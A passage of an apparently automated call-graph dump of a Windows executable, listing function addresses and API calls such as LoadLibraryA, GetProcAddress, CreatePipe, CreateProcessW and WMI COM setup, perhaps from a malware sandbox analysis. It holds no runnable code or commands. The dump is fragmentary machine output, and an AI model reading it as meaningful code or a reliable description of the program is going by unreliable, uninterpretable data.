11887->11888 11907 885ef HeapCreate 11888->11907 11890 8352a 11891 88f78 RtlAllocateHeap 11890->11891 11892 8352f 11891->11892 11893 85eb6 7 API calls 11892->11893 11894 8353a 11893->11894 11895 8cf84 12 API calls 11894->11895 11896 83545 11895->11896 11908 88604 RtlAllocateHeap 11896->11908 11898 83567 11899 83581 lstrcpynW 11898->11899 11906 83571 11898->11906 11900 8359a 11899->11900 11909 92662 11900->11909 11903 89601 2 API calls 11904 8360e GetLastError 11903->11904 11904->11906 11907->11890 11908->11898 11914 926b3 11909->11914 11913 835b8 11913->11903 11913->11906 11915 92709 11914->11915 11917 92678 11914->11917 11915->11917 11919 927a4 11915->11919 11927 88604 RtlAllocateHeap 11915->11927 11917->11913 11920 92aec 11917->11920 11918 8874f memset 11918->11919 11919->11917 11919->11918 11926 92b16 11920->11926 11921 92c42 GetModuleHandleA 11922 92c5b LoadLibraryA 11921->11922 11921->11926 11922->11926 11923 92c74 11923->11913 11924 92ccc GetProcAddress 11924->11926 11925 92cb3 GetProcAddress 11925->11926 11926->11921 11926->11923 11926->11924 11926->11925 11927->11919 13632 8229a 13633 822ab 13632->13633 13634 822c3 13632->13634 13635 89749 2 API calls 13633->13635 13669 82255 13634->13669 13637 822b8 13635->13637 13642 86aed 13637->13642 13640 894b7 2 API calls 13641 822dc 13640->13641 13643 86b0f 13642->13643 13657 86b07 13642->13657 13644 8b4a3 2 API calls 13643->13644 13645 86b18 13644->13645 13645->13657 13676 8fccd 13645->13676 13647 86b2c 13649 8914f 5 API calls 13647->13649 13668 86b32 13647->13668 13648 8861a 2 API calls 13648->13657 13650 86b65 13649->13650 13651 860df 4 API calls 13650->13651 13650->13657 13652 86b77 13651->13652 13653 86b9c 13652->13653 13654 86b84 13652->13654 13656 8a77d 3 API calls 13653->13656 13655 8861a 2 API calls 13654->13655 13655->13657 13658 86baa 13656->13658 13657->13634 13659 86bbc 13658->13659 13660 85886 9 API calls 13658->13660 13661 8861a 2 API calls 13659->13661 13662 86bb8 13660->13662 13663 86bf0 13661->13663 13662->13659 13664 89749 2 API calls 13662->13664 13665 8861a 2 API calls 13663->13665 13666 86bc9 13664->13666 13665->13668 13667 89f06 6 API calls 13666->13667 13667->13659 13668->13648 13670 8b4a3 2 API calls 13669->13670 13671 82266 13670->13671 13672 82296 13671->13672 13673 82287 13671->13673 13674 8a0ab 6 API calls 13671->13674 13672->13640 13675 8861a 2 API calls 13673->13675 13674->13673 13675->13672 13677 8fd18 13676->13677 13678 8fcdc 13676->13678 13684 88604 RtlAllocateHeap 13677->13684 13680 8861a 2 API calls 13678->13680 13681 8fce5 13680->13681 13682 88669 RtlAllocateHeap 13681->13682 13683 8fcfc 13681->13683 13682->13683 13683->13647 13684->13681 13685 8f69b 13688 88604 RtlAllocateHeap 13685->13688 13687 8f6ab 13688->13687 12130 8131e 12131 89ea5 7 API calls 12130->12131 12132 81335 12131->12132 12133 89e1f 7 API calls 12132->12133 12134 81341 12133->12134 12135 81366 12134->12135 12136 9242d _ftol2_sse 12134->12136 12170 811e7 12135->12170 12136->12135 12139 89ed0 7 API calls 12140 813b1 12139->12140 12169 8147c 12140->12169 12177 8763f 12140->12177 12141 8a4ef 4 API calls 12143 81493 12141->12143 12145 8a5c6 8 API calls 12143->12145 12146 8149f 12145->12146 12373 8748a 12146->12373 12147 89ed0 7 API calls 12150 81409 12147->12150 12149 8a4ef 4 API calls 12152 8142e 12149->12152 12161 81412 12150->12161 12200 8636a 12150->12200 12351 8a5c6 12152->12351 12153 814dd 12402 8110b lstrcmpA 12153->12402 12154 814f3 12164 8110b 9 API calls 12154->12164 12166 813d8 12154->12166 12155 8861a 2 API calls 12159 8139b 12155->12159 12161->12149 12162 814e9 12412 810ba 12162->12412 12164->12162 12166->12155 12169->12141 12171 895c7 RtlAllocateHeap 12170->12171 12172 811f8 12171->12172 12173 89292 2 API calls 12172->12173 12174 81214 12173->12174 12175 885c2 2 API calls 12174->12175 12176 81221 12175->12176 12176->12139 12176->12159 12420 8ffa0 12177->12420 12179 8765a 12424 8821d 12179->12424 12181 87670 12182 8821d strncpy 12181->12182 12183 87684 12182->12183 12184 8821d strncpy 12183->12184 12185 8769a 12184->12185 12428 90a21 12185->12428 12187 813cf 12187->12147 12187->12161 12187->12166 12188 876a5 12188->12187 12433 870ea 12188->12433 12190 876d8 12199 876df 12190->12199 12450 87084 12190->12450 12191 8861a 2 API calls 12192 8771a 12191->12192 12193 8861a 2 API calls 12192->12193 12195 87725 12193->12195 12197 8861a 2 API calls 12195->12197 12196 876fe 12455 8726d 12196->12455 12197->12187 12199->12191 12672 88604 RtlAllocateHeap 12200->12672 12202 86380 12203 89e66 7 API calls 12202->12203 12303 86888 12202->12303 12204 86395 12203->12204 12673 8eb91 12204->12673 12209 891e3 RtlAllocateHeap 12210 863b9 12209->12210 12211 891e3 RtlAllocateHeap 12210->12211 12212 863cd 12211->12212 12213 863f2 12212->12213 12214 891e3 RtlAllocateHeap 12212->12214 12215 891e3 RtlAllocateHeap 12213->12215 12214->12213 12216 86417 12215->12216 12699 8d8b8 12216->12699 12222 86486 12223 864ab 12222->12223 12746 88604 RtlAllocateHeap 12222->12746 12225 8109a RtlAllocateHeap 12223->12225 12227 864da 12225->12227 12226 86497 12226->12223 12747 8ac3f 12226->12747 12228 8109a RtlAllocateHeap 12227->12228 12230 864e8 12228->12230 12231 8109a RtlAllocateHeap 12230->12231 12232 864f7 12231->12232 12233 8109a RtlAllocateHeap 12232->12233 12234 86506 12233->12234 12235 8109a RtlAllocateHeap 12234->12235 12236 86515 12235->12236 12237 8109a RtlAllocateHeap 12236->12237 12238 86520 12237->12238 12239 89640 2 API calls 12238->12239 12240 86542 12239->12240 12241 8109a RtlAllocateHeap 12240->12241 12242 8654c 12241->12242 12243 8109a RtlAllocateHeap 12242->12243 12244 8655c 12243->12244 12245 8109a RtlAllocateHeap 12244->12245 12246 8656b 12245->12246 12247 8109a RtlAllocateHeap 12246->12247 12248 8657a 12247->12248 12249 8109a RtlAllocateHeap 12248->12249 12250 8658a 12249->12250 12251 8109a RtlAllocateHeap 12250->12251 12252 8659b 12251->12252 12751 8a9b7 memset CreatePipe 12252->12751 12255 8a9b7 8 API calls 12256 865ba 12255->12256 12257 8a9b7 8 API calls 12256->12257 12258 865cb 12257->12258 12259 8a9b7 8 API calls 12258->12259 12260 865dc 12259->12260 12261 8a9b7 8 API calls 12260->12261 12262 865ed 12261->12262 12263 8a9b7 8 API calls 12262->12263 12264 86601 12263->12264 12265 8a9b7 8 API calls 12264->12265 12266 86612 12265->12266 12267 8a9b7 8 API calls 12266->12267 12268 86623 12267->12268 12269 8a9b7 8 API calls 12268->12269 12270 86634 12269->12270 12271 8a9b7 8 API calls 12270->12271 12272 86644 12271->12272 12273 8a9b7 8 API calls 12272->12273 12274 86654 12273->12274 12275 8a9b7 8 API calls 12274->12275 12276 86661 12275->12276 12277 885d5 2 API calls 12276->12277 12278 86670 12277->12278 12279 885d5 2 API calls 12278->12279 12280 8667a 12279->12280 12281 885d5 2 API calls 12280->12281 12282 86684 12281->12282 12283 885d5 2 API calls 12282->12283 12284 8668e 12283->12284 12285 885d5 2 API calls 12284->12285 12286 86698 12285->12286 12287 885d5 2 API calls 12286->12287 12288 866a2 12287->12288 12289 885d5 2 API calls 12288->12289 12290 866ac 12289->12290 12291 885d5 2 API calls 12290->12291 12303->12161 12352 89e1f 7 API calls 12351->12352 12353 8a5d8 12352->12353 12354 8980c GetSystemTimeAsFileTime 12353->12354 12355 8143a 12354->12355 12356 8773a 12355->12356 12852 8f23f 12356->12852 12358 8775a 12855 87b14 12358->12855 13017 890c1 12373->13017 12376 8f23f GetTickCount 12377 874d1 12376->12377 13023 878e0 12377->13023 12379 874f1 12380 870ea 20 API calls 12379->12380 12391 814d1 12379->12391 12381 87521 12380->12381 12382 87528 12381->12382 12386 87084 6 API calls 12381->12386 12383 8861a 2 API calls 12382->12383 12384 8761f 12383->12384 12385 8861a 2 API calls 12384->12385 12387 8762a 12385->12387 12388 87552 12386->12388 12389 8861a 2 API calls 12387->12389 12388->12382 13062 87302 12388->13062 12389->12391 12391->12153 12391->12154 12392 87580 12392->12382 13075 871b1 12392->13075 12396 875cd 13096 87a5d 12396->13096 12398 875e0 12399 870ea 20 API calls 12398->12399 12400 875fe 12399->12400 12401 8861a 2 API calls 12400->12401 12401->12382 12403 8112e 12402->12403 12404 896ca memset 12403->12404 12411 81185 12403->12411 12405 8114d 12404->12405 12406 8980c GetSystemTimeAsFileTime 12405->12406 12407 81162 12406->12407 12408 89f48 6 API calls 12407->12408 12409 81176 12408->12409 12410 89f06 6 API calls 12409->12410 12410->12411 12411->12162 12413 810da 12412->12413 12414 810c6 12412->12414 12415 89e66 7 API calls 12413->12415 12416 89e66 7 API calls 12414->12416 12417 810cd 12415->12417 12416->12417 12418 89601 2 API calls 12417->12418 12419 810fe 12418->12419 12419->12166 12421 8ffa8 12420->12421 12423 8ffaf 12421->12423 12458 91648 12421->12458 12423->12179 12425 8822e 12424->12425 12426 88233 12424->12426 12425->12181 12471 90080 12426->12471 12429 90a30 12428->12429 12430 90a35 12429->12430 12483 909c5 12429->12483 12430->12188 12432 90a4e 12432->12188 12533 86fee 12433->12533 12435 8710e 12448 87195 12435->12448 12540 8b462 12435->12540 12437 87124 12442 87159 12437->12442 12543 86f09 12437->12543 12438 8861a 2 API calls 12440 87175 12438->12440 12441 8861a 2 API calls 12440->12441 12443 87180 12441->12443 12442->12438 12445 8861a 2 API calls 12443->12445 12444 87132 12444->12442 12551 8e9d4 12444->12551 12447 8718b 12445->12447 12447->12448 12449 8861a 2 API calls 12447->12449 12448->12190 12449->12448 12451 8b4a3 2 API calls 12450->12451 12452 8709c 12451->12452 12453 86f67 5 API calls 12452->12453 12454 870bb 12452->12454 12453->12454 12454->12196 12615 90b0e 12455->12615 12457 87286 12457->12199 12459 91659 12458->12459 12460 91694 12458->12460 12461 9166a 12459->12461 12462 916a7 SwitchToThread 12459->12462 12460->12423 12461->12460 12466 916b8 GetModuleHandleA 12461->12466 12462->12460 12462->12462 12465 9167c _time64 GetCurrentProcessId 12465->12460 12467 916d7 GetProcAddress 12466->12467 12470 91677 12466->12470 12468 916ec GetProcAddress 12467->12468 12467->12470 12469 916fb GetProcAddress 12468->12469 12468->12470 12469->12470 12470->12460 12470->12465 12472 900b2 12471->12472 12473 9008b 12471->12473 12472->12425 12473->12472 12475 900c6 12473->12475 12476 900f4 12475->12476 12477 900d1 12475->12477 12476->12472 12477->12476 12479 91c4a 12477->12479 12480 91c62 12479->12480 12481 91ce9 strncpy 12480->12481 12482 91cb5 12480->12482 12481->12482 12482->12476 12484 909d8 12483->12484 12486 909f4 12484->12486 12487 902b2 12484->12487 12486->12432 12488 902e0 12487->12488 12509 902f2 12487->12509 12489 9039d 12488->12489 12490 9031c 12488->12490 12491 9034c 12488->12491 12492 904b0 12488->12492 12497 9037c 12488->12497 12488->12509 12528 90a7b _snprintf 12489->12528 12494 90322 _snprintf 12490->12494 12511 92122 12491->12511 12495 90a7b 2 API calls 12492->12495 12494->12509 12499 904df 12495->12499 12523 907f7 12497->12523 12502 90561 12499->12502 12507 90697 12499->12507 12499->12509 12500 903ac 12501 902b2 10 API calls 12500->12501 12500->12509 12501->12500 12504 905a2 qsort 12502->12504 12502->12509 12503 907f7 2 API calls 12503->12507 12504->12509 12510 905cb 12504->12510 12505 902b2 10 API calls 12505->12507 12506 907f7 2 API calls 12506->12510 12507->12503 12507->12505 12507->12509 12508 902b2 10 API calls 12508->12510 12509->12486 12509->12509 12510->12506 12510->12508 12510->12509 12512 9212c 12511->12512 12513 9212f _snprintf 12511->12513 12512->12513 12514 92158 12513->12514 12522 921c6 12513->12522 12515 92161 localeconv 12514->12515 12514->12522 12516 9216e strchr 12515->12516 12517 92181 strchr 12515->12517 12516->12517 12518 9217e 12516->12518 12519 9218f strchr 12517->12519 12520 921b3 strchr 12517->12520 12518->12517 12519->12520 12521 9219d 12519->12521 12520->12522 12521->12520 12521->12522 12522->12509 12524 9080d 12523->12524 12525 90995 12524->12525 12526 90910 _snprintf 12524->12526 12527 90927 _snprintf 12524->12527 12525->12509 12526->12524 12527->12524 12530 90a9c 12528->12530 12529 90aa3 12529->12500 12530->12529 12531 91c4a strncpy 12530->12531 12532 90ab9 12531->12532 12532->12500 12555 88604 RtlAllocateHeap 12533->12555 12535 87008 12536 8703d 12535->12536 12537 922d3 _ftol2_sse 12535->12537 12536->12435 12538 87028 12537->12538 12556 86f67 12538->12556 12565 88604 RtlAllocateHeap 12540->12565 12542 8b487 12542->12437 12544 86f1a 12543->12544 12545 8902d _ftol2_sse 12544->12545 12546 86f38 12545->12546 12566 88604 RtlAllocateHeap 12546->12566 12548 86f43 12549 86f5d 12548->12549 12550 89601 2 API calls 12548->12550 12549->12444 12550->12549 12554 8e9e8 12551->12554 12553 8ea2e 12553->12442 12554->12553 12567 8ea35 12554->12567 12555->12535 12557 86f80 12556->12557 12558 81080 RtlAllocateHeap 12557->12558 12559 86f8d lstrcpynA 12558->12559 12560 86fab 12559->12560 12561 885c2 2 API calls 12560->12561 12562 86fb5 12561->12562 12563 86fc7 memset 12562->12563 12564 86fe8 12563->12564 12564->12536 12565->12542 12566->12548 12572 8e668 memset memset 12567->12572 12571 8ea84 12571->12554 12573 895c7 RtlAllocateHeap 12572->12573 12574 8e6bd 12573->12574 12575 895c7 RtlAllocateHeap 12574->12575 12576 8e6ca 12575->12576 12577 895c7 RtlAllocateHeap 12576->12577 12578 8e6d7 12577->12578 12579 895c7 RtlAllocateHeap 12578->12579 12580 8e6e4 12579->12580 12581 895c7 RtlAllocateHeap 12580->12581 12582 8e6f1 memset 12581->12582 12583 8e743 12582->12583 12584 8e785 GetLastError 12583->12584 12585 8e93e 12583->12585 12586 8e752 12583->12586 12590 8e81c GetLastError 12583->12590 12591 8e86b GetLastError 12583->12591 12592 895c7 RtlAllocateHeap 12583->12592 12593 8e8b4 GetLastError 12583->12593 12594 885c2 2 API calls 12583->12594 12595 8e903 GetLastError 12583->12595 12596 8980c GetSystemTimeAsFileTime 12583->12596 12584->12583 12585->12586 12587 8e97c 12585->12587 12588 8e971 GetLastError 12585->12588 12586->12571 12597 8e4fa 12586->12597 12589 89749 2 API calls 12587->12589 12588->12586 12589->12586 12590->12583 12591->12583 12592->12583 12593->12583 12594->12583 12595->12583 12596->12583 12598 8e539 12597->12598 12613 88604 RtlAllocateHeap 12598->12613 12600 8e552 12606 8e55b 12600->12606 12614 88604 RtlAllocateHeap 12600->12614 12602 8861a 2 API calls 12609 8e62e 12602->12609 12603 8861a 2 API calls 12604 8e646 12603->12604 12604->12571 12605 8e608 GetLastError 12605->12606 12607 8e614 12605->12607 12606->12602 12606->12609 12610 8980c GetSystemTimeAsFileTime 12607->12610 12608 8980c GetSystemTimeAsFileTime 12612 8e56b 12608->12612 12609->12603 12609->12604 12610->12606 12611 88698 3 API calls 12611->12612 12612->12605 12612->12606 12612->12608 12612->12609 12612->12611 12613->12600 12614->12612 12616 90b61 12615->12616 12617 90b1b 12615->12617 12616->12457 12617->12616 12620 9122a 12617->12620 12619 90b4e 12619->12457 12627 90c21 12620->12627 12622 91241 12625 91268 12622->12625 12631 9139e 12622->12631 12624 9125f 12624->12625 12626 90c21 8 API calls 12624->12626 12625->12619 12626->12625 12628 90c33 12627->12628 12630 90c6c 12628->12630 12641 90dfa 12628->12641 12630->12622 12632 913b5 12631->12632 12638 913ff 12631->12638 12633 913d1 12632->12633 12634 91425 12632->12634 12632->12638 12635 91414 12633->12635 12636 913d6 12633->12636 12665 911aa 12634->12665 12655 9129b 12635->12655 12636->12638 12640 913e7 memchr 12636->12640 12638->12624 12640->12638 12642 90e14 12641->12642 12643 90e36 12642->12643 12644 90ec8 12642->12644 12645 90e7d 12642->12645 12643->12630 12644->12643 12648 921ff localeconv 12644->12648 12647 90e8d _errno _strtoi64 _errno 12645->12647 12647->12643 12649 92229 _errno strtod 12648->12649 12650 92216 strchr 12648->12650 12651 92253 12649->12651 12652 92262 _errno 12649->12652 12650->12649 12653 92225 12650->12653 12651->12652 12654 9226e 12651->12654 12652->12654 12653->12649 12654->12643 12656 8ffa0 7 API calls 12655->12656 12657 912a7 12656->12657 12658 90c21 8 API calls 12657->12658 12664 912ca 12657->12664 12662 912be 12658->12662 12659 912ea memchr 12659->12662 12659->12664 12660 9139e 17 API calls 12660->12662 12661 900c6 strncpy 12661->12662 12662->12659 12662->12660 12662->12661 12663 90c21 8 API calls 12662->12663 12662->12664 12663->12662 12664->12638 12666 911b3 12665->12666 12667 90c21 8 API calls 12666->12667 12668 911ce 12666->12668 12670 911c6 12667->12670 12668->12638 12669 9139e 18 API calls 12669->12670 12670->12668 12670->12669 12671 90c21 8 API calls 12670->12671 12671->12670 12672->12202 12674 89601 2 API calls 12673->12674 12675 863a0 12674->12675 12676 8d804 12675->12676 12677 895e1 RtlAllocateHeap 12676->12677 12678 8d819 12677->12678 12823 8d523 CoInitializeEx CoInitializeSecurity CoCreateInstance 12678->12823 12681 885d5 2 API calls 12682 8d831 12681->12682 12683 895e1 RtlAllocateHeap 12682->12683 12698 863a5 12682->12698 12684 8d845 12683->12684 12685 895e1 RtlAllocateHeap 12684->12685 12686 8d856 12685->12686 12830 8d748 SysAllocString SysAllocString 12686->12830 12688 8d867 12689 8d895 12688->12689 12691 891e3 RtlAllocateHeap 12688->12691 12690 885d5 2 API calls 12689->12690 12692 8d89e 12690->12692 12693 8d876 VariantClear 12691->12693 12695 885d5 2 API calls 12692->12695 12693->12689 12696 8d8a7 12695->12696 12836 8d5d7 12696->12836 12698->12209 12700 895e1 RtlAllocateHeap 12699->12700 12701 8d8cd 12700->12701 12702 8d523 6 API calls 12701->12702 12703 8d8d7 12702->12703 12704 885d5 2 API calls 12703->12704 12705 8d8e5 12704->12705 12706 895e1 RtlAllocateHeap 12705->12706 12721 86459 12705->12721 12707 8d8f9 12706->12707 12708 895e1 RtlAllocateHeap 12707->12708 12709 8d90a 12708->12709 12710 8d748 9 API calls 12709->12710 12711 8d91b 12710->12711 12712 8d949 12711->12712 12714 891e3 RtlAllocateHeap 12711->12714 12713 885d5 2 API calls 12712->12713 12716 8d952 12713->12716 12715 8d92a VariantClear 12714->12715 12715->12712 12718 885d5 2 API calls 12716->12718 12719 8d95b 12718->12719 12720 8d5d7 2 API calls 12719->12720 12720->12721 12722 8d96c 12721->12722 12723 895e1 RtlAllocateHeap 12722->12723 12724 8d981 12723->12724 12725 8d523 6 API calls 12724->12725 12726 8d98b 12725->12726 12727 885d5 2 API calls 12726->12727 12728 8d999 12727->12728 12729 895e1 RtlAllocateHeap 12728->12729 12744 86461 12728->12744 12730 8d9ad 12729->12730 12731 895e1 RtlAllocateHeap 12730->12731 12732 8d9be 12731->12732 12733 8d748 9 API calls 12732->12733 12734 8d9cf 12733->12734 12735 8d9fd 12734->12735 12737 891e3 RtlAllocateHeap 12734->12737 12736 885d5 2 API calls 12735->12736 12738 8da06 12736->12738 12739 8d9de VariantClear 12737->12739 12740 885d5 2 API calls 12738->12740 12739->12735 12742 8da0f 12740->12742 12743 8d5d7 2 API calls 12742->12743 12743->12744 12745 88604 RtlAllocateHeap 12744->12745 12745->12222 12746->12226 12748 8ac5b 12747->12748 12749 8ac64 memset 12748->12749 12750 8ac92 12748->12750 12749->12750 12750->12223 12752 8aa22 CreatePipe 12751->12752 12757 865a9 12751->12757 12753 8ab52 12752->12753 12754 8aa39 12752->12754 12756 8861a 2 API calls 12753->12756 12841 88604 RtlAllocateHeap 12754->12841 12756->12757 12757->12255 12758 89292 2 API calls 12760 8aa69 12758->12760 12759 891a6 RtlAllocateHeap 12759->12760 12760->12753 12760->12757 12760->12758 12760->12759 12761 8861a 2 API calls 12760->12761 12762 8ab18 12760->12762 12761->12760 12762->12753 12763 89256 2 API calls 12762->12763 12764 8ab3b 12763->12764 12764->12753 12765 8ab41 12764->12765 12766 8861a 2 API calls 12765->12766 12766->12757 12824 8d568 SysAllocString 12823->12824 12826 8d5a5 12823->12826 12825 8d583 12824->12825 12825->12826 12827 8d587 CoSetProxyBlanket 12825->12827 12826->12681 12827->12826 12828 8d59e 12827->12828 12840 88604 RtlAllocateHeap 12828->12840 12831 895e1 RtlAllocateHeap 12830->12831 12832 8d773 SysAllocString 12831->12832 12833 885d5 2 API calls 12832->12833 12835 8d786 SysFreeString SysFreeString SysFreeString 12833->12835 12835->12688 12837 8d5e2 12836->12837 12838 8861a 2 API calls 12837->12838 12839 8d5ff 12838->12839 12839->12698 12840->12826 12841->12760 12853 8f25f GetTickCount 12852->12853 12854 8f24e __aulldiv 12852->12854 12853->12358 12854->12358 12856 8ffa0 7 API calls 12855->12856 12857 87b24 12856->12857 12858 8821d strncpy 12857->12858 12859 87b3d 12858->12859 12860 8821d strncpy 12859->12860 12861 87b51 12860->12861 12862 8821d strncpy 12861->12862 12863 87b62 12862->12863 12864 8821d strncpy 12863->12864 12865 87b73 12864->12865 12866 8821d strncpy 12865->12866 12867 87b89 12866->12867 12868 8821d strncpy 12867->12868 12869 87b9d 12868->12869 12870 8821d strncpy 12869->12870 12871 87bb6 12870->12871 12872 8821d strncpy 12871->12872 12873 87bca 12872->12873 12874 8821d strncpy 12873->12874 12875 87bde 12874->12875 12876 8821d strncpy 12875->12876 12877 87bf2 12876->12877 12878 8821d strncpy 12877->12878 12879 87c08 12878->12879 12880 8821d strncpy 12879->12880 12881 87c1f 12880->12881 13005 88279 12881->13005 12884 8821d strncpy 12885 87c32 12884->12885 12886 8821d strncpy 12885->12886 12887 87c46 12886->12887 12888 8821d strncpy 12887->12888 12889 87c5a 12888->12889 12890 88279 5 API calls 12889->12890 12891 87c62 12890->12891 12892 8821d strncpy 12891->12892 12893 87c6d 12892->12893 12894 88279 5 API calls 12893->12894 12895 87c75 12894->12895 12896 8821d strncpy 12895->12896 12897 87c80 12896->12897 12898 88279 5 API calls 12897->12898 12899 87c88 12898->12899 12900 8821d strncpy 12899->12900 12901 87c93 12900->12901 12902 8821d strncpy 12901->12902 12903 87ca7 12902->12903 12904 88279 5 API calls 12903->12904 12905 87caf 12904->12905 12906 8821d strncpy 12905->12906 12907 87cba 12906->12907 12908 8821d strncpy 12907->12908 12909 87cd4 12908->12909 12910 88279 5 API calls 12909->12910 12911 87cdc 12910->12911 12912 8821d strncpy 12911->12912 12913 87ce7 12912->12913 12914 8821d strncpy 12913->12914 12915 87cfb 12914->12915 12916 8821d strncpy 12915->12916 12917 87d0f 12916->12917 12918 88279 5 API calls 12917->12918 12919 87d20 12918->12919 12920 8821d strncpy 12919->12920 12921 87d2b 12920->12921 12922 8821d strncpy 12921->12922 12923 87d3f 12922->12923 12924 8821d strncpy 12923->12924 12925 87d53 12924->12925 12926 88279 5 API calls 12925->12926 12927 87d5e 12926->12927 12928 8821d strncpy 12927->12928 12929 87d69 12928->12929 12930 88279 5 API calls 12929->12930 12931 87d77 12930->12931 12932 8821d strncpy 12931->12932 12933 87d82 12932->12933 12934 88279 5 API calls 12933->12934 12935 87d8d 12934->12935 12936 8821d strncpy 12935->12936 12937 87d98 12936->12937 12938 88279 5 API calls 12937->12938 12939 87da3 12938->12939 12940 8821d strncpy 12939->12940 12941 87dae 12940->12941 12942 88279 5 API calls 12941->12942 12943 87db9 12942->12943 12944 8821d strncpy 12943->12944 12945 87dc4 12944->12945 12946 88279 5 API calls 12945->12946 12947 87dcf 12946->12947 12948 8821d strncpy 12947->12948 12949 87dda 12948->12949 12950 88279 5 API calls 12949->12950 12951 87de5 12950->12951 13006 87c27 13005->13006 13007 8828a WideCharToMultiByte 13005->13007 13006->12884 13007->13006 13008 882a4 13007->13008 13016 88604 RtlAllocateHeap 13008->13016 13010 882ae 13010->13006 13011 882b8 WideCharToMultiByte 13010->13011 13012 882df 13011->13012 13013 882d1 13011->13013 13015 8861a 2 API calls 13012->13015 13014 8861a 2 API calls 13013->13014 13014->13006 13015->13006 13016->13010 13018 890cf 13017->13018 13019 9242d _ftol2_sse 13018->13019 13020 89119 13019->13020 13021 874cc 13020->13021 13022 9242d _ftol2_sse 13020->13022 13021->12376 13022->13020 13024 8ffa0 7 API calls 13023->13024 13025 878ef 13024->13025 13026 8821d strncpy 13025->13026 13027 87905 13026->13027 13028 8821d strncpy 13027->13028 13029 8791a 13028->13029 13030 8821d strncpy 13029->13030 13031 8792e 13030->13031 13032 8821d strncpy 13031->13032 13033 87943 13032->13033 13034 8821d strncpy 13033->13034 13035 87954 13034->13035 13036 8821d strncpy 13035->13036 13037 8796d 13036->13037 13038 8821d strncpy 13037->13038 13039 87983 13038->13039 13040 8821d strncpy 13039->13040 13041 87994 13040->13041 13042 8821d strncpy 13041->13042 13043 879a8 13042->13043 13044 8821d strncpy 13043->13044 13045 879bb 13044->13045 13046 8821d strncpy 13045->13046 13047 879cf 13046->13047 13048 8821d strncpy 13047->13048 13049 879ee 13048->13049 13050 88279 5 API calls 13049->13050 13051 879ff 13050->13051 13052 8821d strncpy 13051->13052 13053 87a0a 13052->13053 13054 88279 5 API calls 13053->13054 13055 87a1b 13054->13055 13056 8821d strncpy 13055->13056 13057 87a26 13056->13057 13058 8821d strncpy 13057->13058 13059 87a42 13058->13059 13060 90a21 12 API calls 13059->13060 13061 87a4a 13060->13061 13061->12379 13063 90b0e 18 API calls 13062->13063 13064 87320 13063->13064 13065 896ca memset 13064->13065 13068 8732c 13064->13068 13066 87360 13065->13066 13066->13068 13115 88604 RtlAllocateHeap 13066->13115 13068->12392 13069 87458 13071 8861a 2 API calls 13069->13071 13072 87469 13069->13072 13070 87404 13070->13068 13070->13069 13073 891a6 RtlAllocateHeap 13070->13073 13071->13069 13074 8861a 2 API calls 13072->13074 13073->13070 13074->13068 13076 871c8 13075->13076 13077 8725e 13076->13077 13078 8b4a3 2 API calls 13076->13078 13077->12382 13089 8118e 13077->13089 13079 871e4 13078->13079 13079->13077 13080 87233 13079->13080 13116 88604 RtlAllocateHeap 13079->13116 13082 8861a 2 API calls 13080->13082 13084 87254 13082->13084 13083 87201 13083->13080 13086 89601 2 API calls 13083->13086 13085 8861a 2 API calls 13084->13085 13085->13077 13087 87220 13086->13087 13117 882fe 13087->13117 13090 8110b 9 API calls 13089->13090 13091 8119f 13090->13091 13092 811b0 memset 13091->13092 13093 811ac 13091->13093 13094 81da0 66 API calls 13092->13094 13093->12396 13095 811d2 13094->13095 13095->12396 13097 8ffa0 7 API calls 13096->13097 13098 87a6c 13097->13098 13099 8821d strncpy 13098->13099 13100 87a82 13099->13100 13101 8821d strncpy 13100->13101 13102 87a96 13101->13102 13103 8821d strncpy 13102->13103 13104 87aa7 13103->13104 13105 8821d strncpy 13104->13105 13106 87ab8 13105->13106 13107 8821d strncpy 13106->13107 13108 87acd 13107->13108 13109 8821d strncpy 13108->13109 13110 87ae3 13109->13110 13111 8821d strncpy 13110->13111 13112 87af9 13111->13112 13113 90a21 12 API calls 13112->13113 13114 87b01 13113->13114 13114->12398 13115->13070 13116->13083 13124 88604 RtlAllocateHeap 13117->13124 13119 8849e 13119->13080 13120 88380 GetLastError 13123 8840a 13120->13123 13121 8861a 2 API calls 13121->13119 13122 8832a 13122->13119 13122->13120 13122->13123 13123->13121 13124->13122 13233 82027 13234 82064 13233->13234 13235 82057 13233->13235 13237 8902d _ftol2_sse 13234->13237 13239 8206e 13234->13239 13263 8933a 13235->13263 13238 82093 13237->13238 13240 8b4a3 2 API calls 13238->13240 13241 820ab 13240->13241 13242 820b2 13241->13242 13243 89256 2 API calls 13241->13243 13245 8861a 2 API calls 13242->13245 13244 820c1 13243->13244 13270 8b27d memset 13244->13270 13247 82200 13245->13247 13248 8861a 2 API calls 13247->13248 13249 8220b 13248->13249 13250 8861a 2 API calls 13249->13250 13256 82217 13250->13256 13251 8223f 13253 894b7 2 API calls 13251->13253 13252 82234 13255 8861a 2 API calls 13252->13255 13253->13239 13254 8861a 2 API calls 13254->13256 13255->13251 13256->13251 13256->13252 13256->13254 13257 8a77d 3 API calls 13261 820cc 13257->13261 13258 892e5 RtlAllocateHeap lstrcatW 13258->13261 13259 891e3 RtlAllocateHeap 13259->13261 13260 8a911 memset CreateProcessW GetExitCodeProcess CloseHandle 13260->13261 13261->13242 13261->13257 13261->13258 13261->13259 13261->13260 13262 8861a HeapFree memset 13261->13262 13262->13261 13265 89351 13263->13265 13285 88604 RtlAllocateHeap 13265->13285 13266 893b7 13266->13234 13267 89392 lstrcatA 13268 89387 13267->13268 13269 893a6 lstrcatA 13267->13269 13268->13266 13268->13267 13269->13268 13286 88604 RtlAllocateHeap 13270->13286 13272 8b2a4 13273 891e3 RtlAllocateHeap 13272->13273 13284 8b328 13272->13284 13274 8b2c2 13273->13274 13275 891e3 RtlAllocateHeap 13274->13275 13276 8b2d5 13275->13276 13277 891e3 RtlAllocateHeap 13276->13277 13278 8b2e9 13277->13278 13279 895e1 RtlAllocateHeap 13278->13279 13280 8b2f6 13279->13280 13281 885d5 2 API calls 13280->13281 13282 8b31c 13281->13282 13283 891e3 RtlAllocateHeap 13282->13283 13283->13284 13284->13261 13285->13268 13286->13272 13366 85431 13367 8950e 3 API calls 13366->13367 13368 85449 13367->13368 13388 85531 13368->13388 13389 88604 RtlAllocateHeap 13368->13389 13370 85460 13371 895c7 RtlAllocateHeap 13370->13371 13370->13388 13372 85478 13371->13372 13373 89601 2 API calls 13372->13373 13374 8548d 13373->13374 13375 885c2 2 API calls 13374->13375 13376 85495 13375->13376 13377 8a77d 3 API calls 13376->13377 13378 854a3 13377->13378 13379 8861a 2 API calls 13378->13379 13380 854b0 13379->13380 13381 8a911 4 API calls 13380->13381 13385 854bd 13381->13385 13382 8b1b1 13 API calls 13387 854e8 13382->13387 13384 85526 13386 